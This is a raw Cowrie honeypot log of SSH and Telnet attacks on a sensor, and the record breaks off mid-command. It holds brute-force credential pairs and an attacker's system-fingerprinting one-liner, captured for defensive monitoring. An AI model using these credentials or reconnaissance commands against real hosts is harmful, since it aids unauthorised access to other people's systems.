{"eventid":"cowrie.login.success","username":"root","password":"Index@1234","message":"login attempt [root/Index@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:46:16.544201Z","src_ip":"185.93.89.7","session":"b8cdd11457b7"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:16.573489Z","src_ip":"185.93.89.7","session":"b8cdd11457b7"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:46:18.690215Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49338,"dst_ip":"1.2.3.4","dst_port":22,"session":"1812f2e775c5","protocol":"ssh","message":"New connection: 51.79.164.132:49338 (1.2.3.4:22) [session: 1812f2e775c5]","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.466970Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:46:21.538515Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.539607Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.540523Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.541838Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.544049Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.544696Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.545262Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.546120Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.546487Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.547008Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.547490Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.548233Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.548876Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.656413Z","src_ip":"51.79.164.132","session":"1812f2e775c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:46:21.663068Z","src_ip":"51.79.164.132","session":"1812f2e775c5"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:23.472401Z","src_ip":"51.79.164.132","session":"1812f2e775c5"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:25.382395Z","src_ip":"51.79.164.132","session":"1812f2e775c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:46:29.193654Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"7.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:29.194798Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.session.closed","duration":"21.1","message":"Connection lost after 21.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:29.195907Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56094,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5054d7a4554","protocol":"telnet","message":"New connection: 212.227.125.160:56094 (1.2.3.4:23) [session: e5054d7a4554]","sensor":"my-vps","timestamp":"2025-08-28T08:46:33.524117Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass","message":"login attempt [admin/pass] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:34.235027Z","src_ip":"212.227.125.160","session":"e5054d7a4554"}
{"eventid":"cowrie.session.closed","duration":2.951566457748413,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:36.475612Z","src_ip":"212.227.125.160","session":"e5054d7a4554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56130,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c7647ebfe7e","protocol":"telnet","message":"New connection: 212.227.125.160:56130 (1.2.3.4:23) [session: 9c7647ebfe7e]","sensor":"my-vps","timestamp":"2025-08-28T08:46:39.937725Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:40.701019Z","src_ip":"212.227.125.160","session":"9c7647ebfe7e"}
{"eventid":"cowrie.session.closed","duration":2.9621050357818604,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:42.899751Z","src_ip":"212.227.125.160","session":"9c7647ebfe7e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37584,"dst_ip":"1.2.3.4","dst_port":22,"session":"01868804e691","protocol":"ssh","message":"New connection: 51.79.164.132:37584 (1.2.3.4:22) [session: 01868804e691]","sensor":"my-vps","timestamp":"2025-08-28T08:46:47.867916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:48.025537Z","src_ip":"51.79.164.132","session":"01868804e691"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:46:48.433315Z","src_ip":"51.79.164.132","session":"01868804e691"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:49.947451Z","src_ip":"51.79.164.132","session":"01868804e691"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.436335Z","src_ip":"51.79.164.132","session":"01868804e691"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38656,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3ee9c263512","protocol":"ssh","message":"New connection: 185.93.89.7:38656 (1.2.3.4:22) [session: a3ee9c263512]","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.679827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.794092Z","src_ip":"185.93.89.7","session":"a3ee9c263512"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.794819Z","src_ip":"185.93.89.7","session":"a3ee9c263512"}
{"eventid":"cowrie.login.success","username":"root","password":"index2022","message":"login attempt [root/index2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.956175Z","src_ip":"185.93.89.7","session":"a3ee9c263512"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:51.975778Z","src_ip":"185.93.89.7","session":"a3ee9c263512"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43674,"dst_ip":"1.2.3.4","dst_port":22,"session":"cee4d9b934d4","protocol":"ssh","message":"New connection: 185.93.89.7:43674 (1.2.3.4:22) [session: cee4d9b934d4]","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.011856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.018836Z","src_ip":"185.93.89.7","session":"cee4d9b934d4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.031204Z","src_ip":"185.93.89.7","session":"cee4d9b934d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2022","message":"login attempt [root/Index2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.113245Z","src_ip":"185.93.89.7","session":"cee4d9b934d4"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.133736Z","src_ip":"185.93.89.7","session":"cee4d9b934d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50458,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4ad11ad77a7","protocol":"ssh","message":"New connection: 212.227.125.160:50458 (1.2.3.4:22) [session: e4ad11ad77a7]","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.188375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.480971Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:47:01.482253Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:47:04.481110Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:47:07.244714Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep 